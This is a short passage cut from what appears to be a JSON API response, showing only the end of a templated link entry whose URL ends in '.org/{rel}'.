.org\/{rel}","templated":true}]}}